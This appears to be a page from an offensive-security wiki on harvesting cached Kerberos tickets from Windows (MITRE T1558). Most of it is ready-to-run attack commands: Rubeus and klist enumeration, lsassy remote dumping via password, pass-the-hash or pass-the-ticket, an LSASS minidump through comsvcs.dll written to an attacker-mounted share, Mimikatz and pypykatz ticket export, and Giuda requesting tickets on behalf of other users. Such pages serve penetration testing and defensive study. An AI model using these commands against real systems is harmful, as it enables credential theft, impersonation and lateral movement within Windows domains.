Cached Kerberos tickets

MITRE ATT&CK™ Steal or Forge Kerberos Tickets - Technique T1558

Theory

In Windows, Kerberos tickets are handled and stored by the lsass (Local Security Authority Subsystem Service) process, which is responsible for security. Hence, to retrieve tickets from a Windows system, it is necessary to communicate with lsass and ask for them. As a non-administrative user only owned tickets can be fetched, however, as machine administrator, all of them can be harvested using tools like Mimikatz, Rubeus or Giuda.

Practice

Enumerate

Klist is a native Windows tool that can display a list of currently cached Kerberos tickets.

#Enumerate TGT and TGS
klist tickets

#Enumerate sessions
klist sessions

Rubeus can be use to enumerate tickets on windows.

.\Rubeus.exe triage

Dump tickets

From an Unix attacking machine, we can remotely dump tickets using lsassy (python).

# With a password
lsassy -d <DOMAIN.LOCAL> -u <USER> -p <PASSWORD> <TARGET> -K '/tmp/kerberos_tickets'

# With PtH
lsassy -d <DOMAIN.LOCAL> -u <USER> -H <NTHash> <TARGET> -K '/tmp/kerberos_tickets'

# With PtT
lsassy -k <TARGET> -K '/tmp/kerberos_tickets'

We also can do it manually by dumping LSASS memory using one of this techniques, exfiltrate the dump on our attacking machine, and then retrieve tickets using pypykatz.

# Example of a dump where Z: is mounted on the attacking host
tasklist /fi "imagename eq lsass.exe"
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump $lsass_pid Z:\lsass.dmp full

# Get Tickets
pypykatz lsa minidump /path/to/lsass.dmp -k /tmp/kerberos_tickets

Rubeus can also be use to dump TGTs from the LSASS process

# Dump all tickets
.\Rubeus dump

# Dump the interesting one by luid
.\Rubeus.exe dump /service:krbtgt /luid:<luid> /nowrap

# Write ticket to disk
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))

Mimikatz can be use to dump TGTs from the LSASS process

mimikatz # privilege::debug
mimikatz # sekurlsa::tickets /export

Ask a TGS

Using tools like Giuda , we can avoid dumping LSASS memory. With the SeTcbPrivilege, we can read LSA storage, extract the SESSION KEY from TGT, and forge a request asking for a TGS; We must use LUID instead of Username.

Giuda can be use to requests a TGS on behalf of another user (without password)

#Request a TGS
.\guida.exe -gettgs -luid:<LogonID> -msdsspn:<SPN>

#Example
.\guida.exe -gettgs -luid:0x1875dc -msdsspn:HOST/dc01.lab.local

Resources

Harvesting tickets from WindowsHackTricks

Last updated 16 hours ago